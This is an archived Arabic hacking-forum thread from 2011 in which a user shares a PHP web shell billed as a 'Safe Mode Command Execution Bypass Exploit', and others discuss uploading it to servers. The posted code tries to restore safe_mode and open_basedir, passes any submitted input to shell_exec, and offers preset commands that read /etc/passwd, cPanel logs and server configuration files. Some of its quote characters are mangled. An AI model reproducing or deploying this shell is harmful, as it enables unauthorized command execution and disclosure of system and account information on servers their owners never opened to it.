:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   Safe Mode Command Execuriton Bypass (http://www.vbspiders.com/vb/showthread.php?t=50722)

bleu moon 07-04-2011 07:24 AM
Safe Mode Command Execuriton Bypass
 
كود:
<?
echo “<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>”;
print_r(’
<pre>
<form method=”POST” action=”">
<b><font color=blue>Komut :</font></b><input name=”baba” type=”text”><input value=”?al??t?r” type=”submit”>
</form>
<form method=”POST” action=”">
<b><font color=blue>H?zl? Men? :=) :</font><select size=”1¨ name=”liz0¨>
<option value=”cat /etc/passwd”>/etc/passwd</option>
<option value=”netstat -an | grep -i listen”>T?m A??k Portalar? G?r</option>
<option value=”cat /var/cpanel/accounting.log”>/var/cpanel/accounting.log</option>
<option value=”cat /etc/syslog.conf”>/etc/syslog.conf</option>
<option value=”cat /etc/hosts”>/etc/hosts</option>
<option value=”cat /etc/named.conf”>/etc/named.conf</option>
<option value=”cat /etc/httpd/conf/httpd.conf”>/etc/httpd/conf/httpd.conf</option>
</select> <input type=”submit” value=”G?ster Bakim”>
</form>
</pre>
‘);
ini_restore(”safe_mode”);
ini_restore(”open_basedir”);
$liz0=shell_exec($_POST[baba]);
$liz0zim=shell_exec($_POST[liz0]);
$uid=shell_exec(’id’);
$server=shell_exec(’uname -a’);
echo “<pre><h4>”;
echo “<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>”;
echo “<b><font color=red>Server</font></b>:$server<br>”;
echo “<b><font color=red>Komut Sonu?lar?:</font></b><br>”;
echo $liz0;
echo $liz0zim;
echo “</h4></pre>”;
?>
جربتها واشتغلت لوول

migamix 07-04-2011 05:16 PM
ان شاء الله تشتغل
مذوفق أخي

abdellatef 07-04-2011 09:05 PM
تخطي منع تطبيق الاوامر سنجربها ان شاء الله يا غالي
شكرا لك يا غالي
تلك الاكواد لي مكتوبة لي ممكن تعملها فقط :_)
جميل فهمت الكود بدون اطول بالرد الكود تلك الاوامر لي به هي المسحوحة
ممكن يتخطى به سنرفعه ونشوف سرفر مانع الاوامر

abdellatef 07-04-2011 09:16 PM
iهل نستعرض الملف ما تخطى شي :-(

bleu moon 07-04-2011 10:47 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة abdellatef (المشاركة 348996)
iهل نستعرض الملف ما تخطى شي :-(
yes

bleu moon 07-04-2011 10:47 PM
لازمم تستعرض زي ملف php.ini


الساعة الآن 10:33 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0